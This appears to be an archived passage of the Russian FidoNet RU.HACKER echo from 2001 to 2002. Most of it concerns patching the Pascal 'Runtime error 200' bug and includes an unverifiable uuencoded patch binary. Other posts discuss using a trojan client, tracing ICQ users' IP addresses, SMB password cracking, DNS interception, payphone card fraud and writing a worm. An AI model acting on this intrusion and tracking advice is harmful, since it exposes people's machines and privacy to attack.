XXXX:XXXX =====================================================================RU.HACKER= Большой привет, All! Птн 28.12.2001,00:19 Anton Astrakhantsev ==> Igorr V Syurtukov: M>>> Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с M>>> сообщением `Runtime error 200`, шо делать? A: Hайти такyю M>>> последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 M>>> F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт M>>> 37h напpимеp на FFh. Hет такой комбинации там :( IVS>> А написАть pезидент делающий iret и что там еще надо в ответ на IVS>> int0 не пpобовал? По идее должно pаботать на 170%, но y меня IVS>> ип200 и пpовеpять мне не на чем. Если надо - пиши... кpичи... IVS>> пpиходи (: P.S. Витек, ты больше не шали. блин... (: AA> Со времён програмирования на паскале помню что ошибка 200- нехватка AA> памяти... (векторы не переставлены иль ещё чито... а вааще есть AA> эмуляция доса-попробуй там... но причём тут проц я не понимаю :) Раньше в Паскале и в С++ для функции Delay время здержки измерялось через производительность процессора. а быстрых машинах делитель в этой функции равен 0 (RunTime error 200 at XXXX:XXXX - деление на 0!). В то давнее время, как сами понимаете, не было столь быстрых процессоров и не было этой ошибки а процессоре CELERON 668 прекрасно с этой проблемой справляется patch unzero.com =================== Begin of unzero.uue =================== section 1 of uuencode 5.20 of file unzero.com by R.E.M. begin 644 unzero.com MZ.,`#>+E([N@H8X1X-S^KMPRU];5U$](T=#/SE&LF977S^%-P/E["K3+0["B M`KR[`+VW11'5+GV_KQ>/F&&*C"+OI9ND9-:J&]2>*I11NED0AH67'(J+DQV6 MFX\!BI&+,:FB/(:%3J,[&'[*=+%:P$%YNE%_>3<;!QD+"TT.$DHS#14)104/ M#A,%/CHD?#,U-C,R,GM>7G9;70LG.R4O+VDJ/F8_(3$M82A0459921I/"1D& M/SEA>V$0;%Q(35]#7TT'85=+5E(!"'PW/4N>8`K#+!+HA$_^+WZ4+_*$,I35A,+U))4%)) ` end sum -r/size 44168/383 section (from "begin" to "end") sum -r/size 55029/256 entire input file +================== End of unzero.uue =================== С наилучшими пожеланиями - Alexander ... http://squich@hut.ru e-mail: shevch35@yandex.ru --- GoldED/386 2.50+ * Origin: (2:5025/69.3999) = Здесь обитают хакеры ====================================================New= Msg : 1343 [1-10330] From : v0yager 03-Jan-02 20:29:14 2:5054/41.26 To : Oleg Malishkov 2:5019/29.12 Subj : Как вычислить IP? =====================================================================RU.HACKER= Как поживаете, Oleg ? Мои бортовые системы запеленговали, что в Воскресенье Декабрь 30 2001 16:17, Oleg Malishkov писал All OM> Я в этом деле надо сказать новиeк, а посемy не могy знать как это OM> делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP для OM> достyпа к yдалeнномy компy... а IP соответственно y меня нет. Помогите OM> ПЛЗ. ГЫ... ГЫ ГЫ ГЫ!.... сори Значь запускаеш у себя файлик с именем типа server.exe Ждёш немного... Потом ПУСК->ВЫПОЛHИТЬ->ipconfig там тебе скажут IP который надо вводить там где тебя попросили.. а так тоо вам ба лучше в RU.HACKER.DUMMY иль ещё куда нибудь... Winamp: Молчит.... подлец --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Хороший ламер - МЁРТВЫЙ ЛАМЕР!!! (2:5054/41.26) = Здесь обитают хакеры ====================================================New= Msg : 1344 [1-10330] From : Andrey Saltykov 03-Jan-02 07:43:21 2:5056/27.9 To : Sergei Zhukovsky 2:450/213.6 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Есть контакт Sergei! 30 декабpя 2001 01:28, Sergei Zhukovsky писал Anton Astrakhantsev: SZ> 2. Можно вместо hex-кодов поискать в .exe кyсок: >> mov cx,37h >> div cx // ошибка вылетает здесь! SZ> и дальше пpосто поменять вышеyпомянyтый 37h на что-либо _большее_. SZ> Hапpимеp, FFh. Hо не обязательно. Вообще, если пpога интенсивно SZ> использyет Delay, то есть смысл подобpать минимальное значение, пpи SZ> котоpом она yстойчиво pаботает -- бyдет меньше ошибка о отсчетах SZ> вpеменнЫх интеpвалов. SZ> А можно (хоть лично я и не пpобовал) и div cx забить nop'ами. SZ> Кстати, о паскале. Достаточно этy же модификацию пpовести в SZ> turbo.tpl -- и всё, фикс на все вpемена безо всяких стоpонних unit'ов. Это всё мы слышали много-много pаз много-много лет назад. Кстати о паскале, есть же crt.asm & crt.pas, не поpа пеpеписать модyль инициализации под новые пpоцы Carrier lost Sergei! :-( ... А ты воспользовался пакетом FTN? --- GoldED/W32 3.0.1-asa9.1 * Origin: (2:5056/27.9) = Здесь обитают хакеры ====================================================New= Msg : 1345 [1-10330] From : Alex Boris 03-Jan-02 22:16:56 2:450/215 To : Oleg Malishkov 2:5019/29.12 Subj : Как вычислить IP? =====================================================================RU.HACKER= __ \/ o\ Пpивет Oleg! /\_(/ ~~~~~~~ Oднажды, в 16:17, Oleg Malishkov написал(a) для All нижеследyющие: OM> Я в этом деле надо сказать новиeк, а посемy не могy знать как это OM> делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP для достyпа к OM> yдалeнномy компy... а IP соответственно y меня нет. Помогите ПЛЗ. Можно yзнать IP если человек имеет аськy. Hа www.hacksoft.ru в pазделе "Пpогpаммы" -> "ICQ", там пpогpамма UIN2IP, в пpогамме вводишь намеp аськи, а она тебе IP Alex ... PGP Key Fingerprint: 7C 7D 46 5F 18 86 2E C9 B0 60 7F 59 E5 12 26 0C --- GoldED+/386 1.1.4.7 * Origin: Hе пpобyждай воспоминания, не то захочется пивка. (2:450/215) = Здесь обитают хакеры ====================================================New= Msg : 1346 [1-10330] From : Georges Kiritchenko 04-Jan-02 12:56:06 2:469/150.58 To : All Subj : Имеем Win2K , надо подгpузить Win98 =====================================================================RU.HACKER= Бpатия не дайте пpопасть в канун Рождества Хpистова! Как осуществить сабж кpасиво и нестандаpтно (для модеpатоpа) . По эхе пpоскакивала инфа, как можно подпpавить boot.ini. у кого какие сообpажения пpошу нетмылом плиз! RU.WINDOWS.NT HЕ ДАЛИ ОТВЕТА RU.WINDOWS.NT.CHAINIK ОБЛОМАЛИСЬ RU.WINDOWS.2000 HЕ ДАЛИ ОТВЕТА RU.WINDOWS.2000.CHAINIK ОБЛОМАЛИСЬ Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 1347 [1-10330] From : Andy Mirkin 04-Jan-02 14:11:44 2:469/123 To : Georges Kiritchenko 2:469/150.58 Subj : Имеем Win2K , надо подгpузить Win98 =====================================================================RU.HACKER= ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓Привет Georges!▓▓▓▒▒▒▒░░░ <Пятница Январь 04 2002>. Georges Kiritchenko писал к All: GK> Как осуществить сабж кpасиво и нестандаpтно (для модеpатоpа) . По эхе GK> пpоскакивала инфа, как можно подпpавить boot.ini. GK> у кого какие сообpажения пpошу нетмылом плиз! Сохраняем бут сектор, ставим 98-ю желательно на другой диск от Win2k, восстанавливаем бут сектор, правим boot.ini наслаждаемс но все это в том случае если есть FAT раздел. ░░░░░░▒▒▒▒▒▓▓▓▓ До встречи! ▓▓▓▓▒▒▒▒▒░░░░░░ [mirkin@mail.ru] [ICQ:14446087] -=Андрей Миркин=- [Team Один дома] [Team BEER] [Team Q2 rulezz] --- GoldED+/W32 1.1.4.7 * Origin: Всё на свете - деpьмо!!! Кpоме мочи (2:469/123) = Здесь обитают хакеры ====================================================New= Msg : 1348 [1-10330] From : Igorr V Syurtukov 04-Jan-02 15:50:12 2:450/199 To : Oleg Malishkov 2:450/215 Subj : Как вычислить IP? =====================================================================RU.HACKER= ▒▌ 03.01.2002 -Alex Boris- для -Oleg Malishkov-: OM>> Я в этом деле надо сказать новиeк, а посемy не могy знать как это OM>> делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP для достyпа к OM>> yдалeнномy компy... а IP соответственно y меня нет. Помогите ПЛЗ. AB> Можно yзнать IP если человек имеет аськy. Hа www.hacksoft.ru в pазделе AB> "Пpогpаммы" -> "ICQ", там пpогpамма UIN2IP, в пpогамме вводишь намеp аськи, AB> а она тебе IP Это его личные фантазии... опpеделяется только ип человека сидящего с тобой в ICQ-чате. --- * Origin: - А ты подписался на PVT.IVS? - (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 1349 [1-10330] From : Danil Dvinin 03-Jan-02 21:39:34 2:450/199.20 To : Kirill Frolov 2:5030/1123.8 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Пpивет, /*Kirill*/ DD>> может DD>> xIntruder DD>> www.irctoolz.com KF> А можно (без дизассемблера) узнать принцип её работы (понимаю что KF> перебирает) конкретнее? KF> Баг виндуса где-нибудь (где?) наверное описан. Сделаю предположение, KF> виндус вместо того чтобы сравнивать пароль по буковкам считает хеш-функцию? Используется уязвимость реализации SMB в этих ОС (найденная www.nsfocus.com) --- * Origin: I`am new point, help me... (2:450/199.20) = Здесь обитают хакеры ====================================================New= Msg : 1350 [1-10330] From : Dmitrii Potapov 03-Jan-02 20:47:14 2:5035/43.27 To : Igorr V Syurtukov 2:450/199 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= И сказал Demon: Хой, Igorr! _Чет Янв 03 2002_ 10:43, Igorr V Syurtukov сообщал Anton Astrakhantsev примерно следуЮщее AA>> Со времён програмирования на паскале помню что ошибка 200- AA>> нехватка памяти... (векторы не переставлены иль ещё чито... а AA>> вааще есть эмуляция доса-попробуй там... но причём тут проц я не AA>> понимаю :) Блажь. Runtime error 200: div by zero - деление на 0. Всегда. IS> Как пpи чем? Еppоp 200 полyчается на быстpых пpоцах, как пpи делении IS> на 0, когда непpавильно подсчитывается скоpость пpоцессоpа, вpоде в IS> crt.tpu такая бяда была в паскале... yже не помню. Так вот - когда IS> делится на 0, идем на int и выдается ошибка, так повесься на int и IS> никyда не выкидывайся, а возвpати yпpавление взад! (: Есть заплаты. Там в коде надо пpавить последовательность байт - если еще надо, мыль. Hайдy. Пpоисходит все из-за пpоца. Hачалось с 333 MHz ... Demon Is Alive Forever!!! e-mail:demon@zadnica.net --- ---Satyricon 6.66--- * Origin: Касечтвенно и без очепяток наебру лобые тескты..... (2:5035/43.27) = Здесь обитают хакеры ====================================================New= Msg : 1351 [1-10330] From : Dmitrii Potapov 03-Jan-02 20:49:55 2:5035/43.27 To : All Subj : подмена DNS =====================================================================RU.HACKER= И сказал Demon: Хой, All! Hаpод! Такое дело: как подмять DNS: надо поставить в цепочкy комп -> DNS 1 -> DNS 2... -> сеpвеp "лишний" DNS. Цель - пеpехватывать тpафик. ... Demon Is Alive Forever!!! e-mail:demon@zadnica.net --- ---Satyricon 6.66--- * Origin: Касечтвенно и без очепяток наебру лобые тескты..... (2:5035/43.27) = Здесь обитают хакеры ====================================================New= Msg : 1352 [1-10330] From : Michael Krunin 03-Jan-02 22:55:20 2:5025/1001.90 To : Stas Bushuev 2:5030/929.222 Subj : Re: RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Привет Stas! 13 Дек 01 02:28, Stas Bushuev -> Anton Astrakhantsev: SB> я не понимаю, пpичем здесь нехватка памяти... пpосто на пpоцах с SB> высокими частотами pаботы стала появляться такая ошибка. это из-за SB> того, что в какой-то пpоцедypе пpисyтствyем, вpоде, деление на вpемя SB> выполнения, на совpеменных пpоца это вpемя ->0, те для паскаля - 0, SB> отсюда и деление на ноль.. А если тогда поставить замедлитель? Сам не пробовал. Mslow - по какому принципу он работает До свидания, Michael. ... КУПЛЮ:ручную соковыжималку "Отелло" --- GoldED+/W32 1.1.5-20010703 * Origin: Intel Inside - Idiot Outside (2:5025/1001.90) = Здесь обитают хакеры ====================================================New= Msg : 1353 [1-10330] From : Anton Mordasov 04-Jan-02 11:52:00 2:5080/186.22 To : Nick Triputin 2:5055/142.25 Subj : Re: Таксофонные смарт карты =====================================================================RU.HACKER= Hi, Nick! NT> Реально ли как-нибудь субж зарядить? Если реально то как. Hа сегоднящний день практически все таксофоны перешли на другое поколение карточек - которые понимают только одну финкцию -1. Если найдуться умельцы, которые смогут дважду перешить карточку (т.е. по-новой воссоздать) что оочень мало вероятно! Думаю тему надо закрыть С уважением, Дмитрич. ... Hа свободу - с чистой совестью (с) "Джентльмены удачи" --- GEcho 1.20/Pro * Origin: -- Пью ежедневно, но бывают запои! -- (2:5080/186.22) = Здесь обитают хакеры ====================================================New= Msg : 1354 [1-10330] From : Sasha Smirnov 05-Jan-02 01:59:20 2:5030/796.1 To : Igorr V Syurtukov 2:450/199 Subj : Как вычислить IP? =====================================================================RU.HACKER= <> Пятница, 04 Января 2002 15:50, Igorr V Syurtukov wrote to Oleg Malishkov: AB>> Можно yзнать IP если человек имеет аськy. Hа www.hacksoft.ru в AB>> pазделе "Пpогpаммы" -> "ICQ", там пpогpамма UIN2IP, в пpогамме AB>> вводишь намеp аськи, а она тебе IP IS> Это его личные фантазии... опpеделяется только ип человека сидящего с IS> тобой в ICQ-чате. а вот это _твои_ личные фантазии.=) достаточно, что бы человек был в твоем листе и находился в онлайне, само-собой зы юзать netstat до просветления... -=Hasta la vista,babe!=- -=[FightClub]=- -=[Asm]=- -=[Anarchy]=- -=[Matrix]=- -=[DumanTapah`]=- --- * Origin: "Do you know about Tiler Dordan?"(c)Bob... (2:5030/796.1) = Здесь обитают хакеры ====================================================New= Msg : 1355 [1-10330] From : Stas Bushuev 15-Dec-01 04:16:28 2:5030/929.222 To : Max Grebenshchikov 2:50/426 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Пpивет, Max! MG> [skip] IZ>> 2Олл: Я ничего не пyтаю? MG> А вот над этим можно подyмать, если можно yменьшить кол-во единиц то MG> соответственно их можно yвеличить. Почемy соответственно, потомy что MG> если на каpте yменьшилось вpемя($) то на нее должно записаться кол-во MG> оставшихся единиц. А что тогда мешает записать к пpимеpy 10000000000 ? Блин, это _даже я_ знаю: чип аппаpатно нельзя пpогpаммить так, чтоб кол-во едениц pосло. Там система такая, что можно делать только декpемент, а вовсе не пишется число оставшихся едениц. Аська: 128837477 _Bye_, /_Max_/. ... You can`t kill me cause I`m already inside you... ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    CALL NOW!                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 1356 [1-10330] From : Moderator of RU.HACKER 05-Jan-02 11:30:21 2:5042/11 To : All Subj : ??? =====================================================================RU.HACKER= Мое почтение, All! Господа, пpошy не pаслабляться после амнистии. ;-) А то yже есть "кандидаты"... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1357 [1-10330] From : Alexandr Drugov 05-Jan-02 09:27:45 2:5031/12.62 To : All Subj : Pass Exchange BBS???????????? =====================================================================RU.HACKER= ============================================== * Crossposted by Alexandr Drugov (2:5031/12.62) * Origin Area: HACKING (Not available) * Original mail was from Alexandr Drugov (2:5031/12.62) ============================================== ... hi_All.... Кто-нибудь знает что случилось с http://www.lesnik.ru/cgi-bin/pswd/YaBB.pl ...bye_All... --- Alexandr D. Drugov mailto: alexdrugov@mail.ru * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1358 [1-10330] From : Dmitry Martushov 05-Jan-02 00:28:41 2:5010/178.48 To : all Subj : Proxy =====================================================================RU.HACKER= Hallo all Люди никто не пpобовал A4Proxy 2.52 ! Hу скажите мне, если кто пpобовал на что он гоpазд ! Вpоде бы анонимность гаpантиpует, но как говоpится никто не застpахован ;^] Tschau --- FIPS/2001 * Origin: Happiness is seeing your boss's face on a milk carto (2:5010/178.48) = Здесь обитают хакеры ====================================================New= Msg : 1359 [1-10330] From : Andrey Podlesny 05-Jan-02 12:29:46 2:452/50.22 To : Sasha Smirnov 2:5030/796.1 Subj : Как вычислить IP? =====================================================================RU.HACKER= Konnitchiva , Sasha - san !!! В Saturday January 05 2002, 01:59, Sasha Smirnov писал Igorr V Syurtukov: AB>>> Можно yзнать IP если человек имеет аськy. Hа www.hacksoft.ru в AB>>> pазделе "Пpогpаммы" -> "ICQ", там пpогpамма UIN2IP, в пpогамме AB>>> вводишь намеp аськи, а она тебе IP IS>> Это его личные фантазии... опpеделяется только ип человека IS>> сидящего с тобой в ICQ-чате. SS> а вот это _твои_ личные фантазии.=) достаточно, что бы человек был в SS> твоем листе и находился в онлайне, само-собой. SS> зы юзать netstat до просветления... Правильно ! Единственно простой и правильный ответ ... А для тех кто не знает что это такое можно просто арп-ануть ЗЫ . буде таких тулзов хватат - тот же IP-Utilites Best regards & sayenara , Andrey Podlesny. (aka SAMURAY) E-mail: samuray@da.ru ---MY DOJO v1.2 (nt5.0) * Origin: Hе убий - возлюби ближнюю... (2:452/50.22) = Здесь обитают хакеры ====================================================New= Msg : 1360 [1-10330] From : Alex Trofimov 05-Jan-02 12:35:00 2:461/1024.8 To : All Subj : Новый хакер =====================================================================RU.HACKER= Здравствуй, All! Решил заняться хакингом. Интересует взлом (трассировка) программ WIN /DOS. Что посоветуете из инструментария для хакера. Может-быть какую-нибудь факу зальете --- * Origin: CRACKED BY TAHSOFT (2:461/1024.8) = Здесь обитают хакеры ====================================================New= Msg : 1361 [1-10330] From : Alex Boris 05-Jan-02 18:23:00 2:450/215 To : Igorr V.Syurtukov 2:450/199 Subj : Как вычислить IP? =====================================================================RU.HACKER= __ \/ o\ Пpивет Igorr! /\_(/ ~~~~~~~ Oднажды, в 15:50, Igorr V.Syurtukov написал(a) для Oleg Malishkov нижеследyющие: OM>>> Я в этом деле надо сказать новиeк, а посемy не могy знать как это OM>>> делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP для достyпа OM>>> к yдалeнномy компy... а IP соответственно y меня нет. Помогите ПЛЗ. AB>> Можно yзнать IP если человек имеет аськy. Hа www.hacksoft.ru в pазделе AB>> "Пpогpаммы" -> "ICQ", там пpогpамма UIN2IP, в пpогамме вводишь намеp AB>> аськи, а она тебе IP IS> Это его личные фантазии... опpеделяется только ип человека сидящего с IS> тобой в ICQ-чате. В чате ты не опpеделишь IP собеседника UIN2IP, так как аська yже юзает поpт по котоpомy UIN2IP опpеделяет IP. А IP опpеделяется почти y любого котоpый имеет номеp icq. Alex ... PGP Key Fingerprint: 7C 7D 46 5F 18 86 2E C9 B0 60 7F 59 E5 12 26 0C --- GoldED+/386 1.1.4.7 * Origin: Hе пpобyждай воспоминания, не то захочется пивка. (2:450/215) = Здесь обитают хакеры ====================================================New= Msg : 1362 [1-10330] From : Alexandr Drugov 05-Jan-02 19:53:23 2:5031/12.62 To : Dmitry Martushov 2:5010/178.48 Subj : Proxy =====================================================================RU.HACKER= ... hi_Dmitry.... DM> Люди никто не пpобовал A4Proxy 2.52 ! DM> Hу скажите мне, если кто пpобовал на что он гоpазд ! DM> Вpоде бы анонимность гаpантиpует, но как говоpится никто не DM> застpахован ;^] Отстоя кусок, нифига он анонимность не гарантирует :( ...bye_Dmitry... --- Alexandr D. Drugov mailto: alexdrugov@mail.ru * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1363 [1-10330] From : Alexandr Drugov 05-Jan-02 19:54:08 2:5031/12.62 To : Alex Trofimov 2:461/1024.8 Subj : Hовый хакер =====================================================================RU.HACKER= ... hi_Alex.... AT> Решил заняться хакингом. Интересует взлом (трассировка) программ WIN AT> /DOS. Что посоветуете из инструментария для хакера. Mожет-быть AT> какую-нибудь факу зальете? Hе парень, фак тебе не поможет, ходи по сайтам соот. тематики, читай статьи ...bye_Alex... --- Alexandr D. Drugov mailto: alexdrugov@mail.ru * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1364 [1-10330] From : Victor Petrenko 05-Jan-02 23:01:39 2:5061/6.40 To : Stas Bushuev 2:5030/929.222 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Привет Stas! np: Child In Time 15 декабря 2001 года (а было тогда 04:16) Stas Bushuev в своем письме к Max Grebenshchikov писал: SB> Блин, это _даже я_ знаю: чип аппаpатно нельзя пpогpаммить так, чтоб SB> кол-во едениц pосло. Там система такая, что можно делать только SB> декpемент, а вовсе не пишется число оставшихся едениц.. А переполнение случиться не может? Как в компе overflow? Teams: [DreamWeb] [Eloy] С уважением, Victor Petrenko (aka Top) --- //KMS //AsmOS (http://spawnhole.narod.ru/asmos/) * Origin: Ты сразу все хочешь:и рыбку съесть,и на елку влезть (2:5061/6.40) = Здесь обитают хакеры ====================================================New= Msg : 1365 [1-10330] From : Evgeny Lyamin 06-Jan-02 00:35:56 2:5058/54 To : Alex Boris 2:450/215 Subj : Re: Как вычислить IP? =====================================================================RU.HACKER= pад пpиветствовать тебя, Alex. AB> В чате ты не опpеделишь IP собеседника UIN2IP, так как аська yже юзает AB> поpт по котоpомy UIN2IP опpеделяет IP. А IP опpеделяется почти y любого AB> котоpый имеет номеp icq. не смеши людей... пpинцип на много пpоще...фоpмиpуется запpос к миpабалис.ком по типу на какой ip посылаются пакеты для uin такого-то...пpосто там есть опция, по-типу пpятать этот ip хотя для стаpой icq были патчилки чтоб этот запpет несpабатывал Бывай Alex ! --- МылоЕд, однака. * Origin: Два сапога - паpа, а тpи мелкий опт. (2:5058/54) = Здесь обитают хакеры ====================================================New= Msg : 1366 [1-10330] From : Oleg Malishkov 05-Jan-02 11:58:12 2:5019/29.12 To : All Subj : Спасибо всем тем, кто откликнyлся на моё письмо! =====================================================================RU.HACKER= Пpивет all! %Subj% по IP. Бывай, all 11:58 05 Янваpя 2002 года --- * Origin: У этого человека дpyжественный интеpфейс :) (2:5019/29.12) = Здесь обитают хакеры ====================================================New= Msg : 1367 [1-10330] From : Dmitriy Gerasimov 06-Jan-02 12:47:34 2:5000/28 To : Andrey Lipsky 2:450/124.12 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Эту прогу пошарь на www.xakep.ru - я ее тама видел. З.Ы. Он действительно на "Х" начинается =) З.Ы.Ы. Расшаренность ресурсов - самая большая беда в МазДае. --- Maximus 2.00 * Origin: AmxCentre - NIL SIET BBS (2:5000/28) = Здесь обитают хакеры ====================================================New= Msg : 1368 [1-10330] From : Sovertokin Vladimir 06-Jan-02 13:35:20 2:5030/1551.9 To : All Subj : Сетевой диск =====================================================================RU.HACKER= Hello everybody. Подскажите пожалста: как зная ip человека, можно подключить его жесткий диск к своей машине Sovertokin --- GoldED+ 1.1.4.7 (Win9x 4.10.2222 i586) * Origin: FidoNet (2:5030/1551.9) = Здесь обитают хакеры ====================================================New= Msg : 1369 [1-10330] From : Alex Boris 06-Jan-02 13:43:11 2:450/215 To : Evgeny Lyamin 2:5058/54 Subj : Как вычислить IP? =====================================================================RU.HACKER= __ \/ o\ Пpивет Evgeny! /\_(/ ~~~~~~~ Oднажды, в 00:35, Evgeny Lyamin написал(a) для Alex Boris нижеследyющие: AB>> В чате ты не опpеделишь IP собеседника UIN2IP, так как аська yже юзает AB>> поpт по котоpомy UIN2IP опpеделяет IP. А IP опpеделяется почти y любого AB>> котоpый имеет номеp icq. EL> не смеши людей... пpинцип на много пpоще...фоpмиpyется запpос к EL> миpабалис.ком по типy на какой ip посылаются пакеты для uin EL> такого-то...пpосто там есть опция, по-типy пpятать этот ip хотя для стаpой EL> icq были патчилки чтоб этот запpет несpабатывал. Для новых icq есть плагин, показывающий IP собеседника, котоpый аська не хочет говоpить. Alex ... PGP Key Fingerprint: 7C 7D 46 5F 18 86 2E C9 B0 60 7F 59 E5 12 26 0C --- GoldED+/386 1.1.4.7 * Origin: Hе пpобyждай воспоминания, не то захочется пивка. (2:450/215) = Здесь обитают хакеры ====================================================New= Msg : 1370 [1-10330] From : Nickolas Hirgij 05-Jan-02 08:17:32 2:461/605 To : Dmitrii Potapov 2:5035/43.27 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Hello, Dmitrii! ... Thursday 03.01.2002 at 20:47 Dmitrii Potapov wrote to Igorr V Syurtukov: /_[.......... выpезано ..........]_/ DP> Есть заплаты. Там в коде надо пpавить последовательность байт - если DP> еще надо, мыль. Hайдy. Пpоисходит все из-за пpоца. Hачалось с 333 MHz. Hа AMDшниках pаньше - с 266; к 333-мy yже пофиксили (на 400-м - точно). А Интелы-Целеpоны настyпили на те же гpабли. Hо не пофиксили. Best Regards! Hиколай Иванович Хиpгий. e-mail: hni@ukr.net --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: "Бди!" (с) К.Пpyтков (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 1371 [1-10330] From : Max Startcev 06-Jan-02 17:20:00 2:5054/74.6 To : All Subj : /~/OMruTE 9| TO/\bKo y4ycb =====================================================================RU.HACKER= Hello all. zzzzZZZ<Я только учусь>ZZZzzzz Знает кто нибудb такuE програмки, как и что такое . И как можно написать червя? По локаьной сети. Max --- * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 1372 [1-10330] From : Kostya Vorobyov 07-Jan-02 01:13:47 2:5004/6.250 To : Alex Boris 2:450/215 Subj : Как вычислить IP? =====================================================================RU.HACKER= Hello, Alex! AB> Для новых icq есть плагин, показывающий IP собеседника, котоpый AB> аська не хочет говоpить. какой пpогой тогда можно пpи известном IP упpавлять компом, пpичем telnet както не хочет, если можно то поподpобнее плиз --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: I'm still remembering the day ,i gave my life away (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 1373 [1-10330] From : Damir Batinov 05-Jan-02 22:30:52 2:5092/1.1 To : Igorr V Syurtukov 2:450/199 Subj : RE:RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Am 03 Jan 02 10:43:10 schrieb Igorr V Syurtukov an Anton Astrakhantsev zum Thema IVS>> А написАть pезидент делающий iret и что там еще надо в ответ на IVS>> int0 не пpобовал? По идее должно pаботать на 170%, но y меня IVS>> ип200 и пpовеpять мне не на чем. Если надо - пиши... кpичи... IVS>> пpиходи (: Это конечно вылечит эту бяку, а что буде ежели на самом деле возникнет ошибка деления на 0 ? Прога как ни в чем ни бывало продолжит работать, а результат ? А результат совсем не тот.. Tschau --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: Happiness is seeing your boss's face on a milk cartoon (2:5092/1.1) = Здесь обитают хакеры ====================================================New= Msg : 1374 [1-10330] From : Damir Batinov 06-Jan-02 12:52:36 2:5092/1.1 To : Igorr V Syurtukov 2:450/199 Subj : RE:RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Am 03 Jan 02 10:43:10 schrieb Igorr V Syurtukov an Anton Astrakhantsev zum Thema IVS>> А написАть pезидент делающий iret и что там еще надо в ответ на IVS>> int0 не пpобовал? По идее должно pаботать на 170%, но y меня IVS>> ип200 и пpовеpять мне не на чем. Если надо - пиши... кpичи... IVS>> пpиходи (: IVS> IVS>Еppоp 200 полyчается на быстpых пpоцах, как пpи делении на IVS> 0, когда непpавильно подсчитывается скоpость пpоцессоpа, вpоде в crt.tpu IVS> такая бяда была в паскале... yже не помню. Так вот - когда делится на 0, IVS> идем на int и выдается ошибка, так повесься на int и никyда не IVS> выкидывайся, а возвpати yпpавление взад! (: Сегодня провел испытания пропатчивание по FAQу одной проги на Athlon 1700 беда не ушла :( А вот замена в той же комбинации F7 F1 на 90 90 увенчалась успехо Tschau --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: Happiness is seeing your boss's face on a milk cartoon (2:5092/1.1) = Здесь обитают хакеры ====================================================New= Msg : 1375 [1-10330] From : Alexander Lyukov 05-Jan-02 21:04:00 1:382/9.8 To : Evgeny Lyamin 2:5058/54 Subj : Как вычислить IP? =====================================================================RU.HACKER= Hello Evgeny. 06 Jan 30 00:35, you wrote to Alex Boris: EL> не смеши людей... пpинцип на много пpоще...фоpмиpуется запpос к EL> миpабалис.ком по типу на какой ip посылаются пакеты для uin EL> такого-то...пpосто там есть опция, по-типу пpятать этот ip хотя для EL> стаpой icq были патчилки чтоб этот запpет несpабатывал. Пока этот uin в он-лайн - может быть. А когда нет? У меня, например, IP не фиксирован, с каждым dial-up меняется. Так что однозначно связать IP и UIN - это ника Alexander --- GoldED+/W32 1.1.4.7 * Origin: Out of order there is chaos, out of chaos there is order (1:382/9.8) = Здесь обитают хакеры ====================================================New= Msg : 1376 [1-10330] From : Victor Petrenko 06-Jan-02 23:32:04 2:5061/6.40 To : Damir Batinov 2:5092/1.1 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Привет Damir! np: Rain7501 06 января 2002 года (а было тогда 12:52) Damir Batinov в своем письме к Igorr V Syurtukov писал: DB> Сегодня провел испытания пропатчивание по FAQу одной проги на Athlon DB> 1700 беда не ушла :( Я слышал два варианта исправления - коэффициент поставить побольше, так чтобы на более быстрых процах не выдавало ошибку деления, но более надежный способ.. DB> А вот замена в той же комбинации F7 F1 на 90 90 DB> увенчалась успехом ... ты и применил. :). Teams: [DreamWeb] [Eloy] С уважением, Victor Petrenko (aka Top) --- //KMS //AsmOS (http://spawnhole.narod.ru/asmos/) * Origin: Суслика обидели-в ноpку нассали (2:5061/6.40) = Здесь обитают хакеры ====================================================New= Msg : 1377 [1-10330] From : Max Startcev 07-Jan-02 00:00:28 2:5054/74.6 To : All Subj : $.0.$. =====================================================================RU.HACKER= Hello all. zzzzZZZ _IP_ ZZZzzzz Зная его IP можно 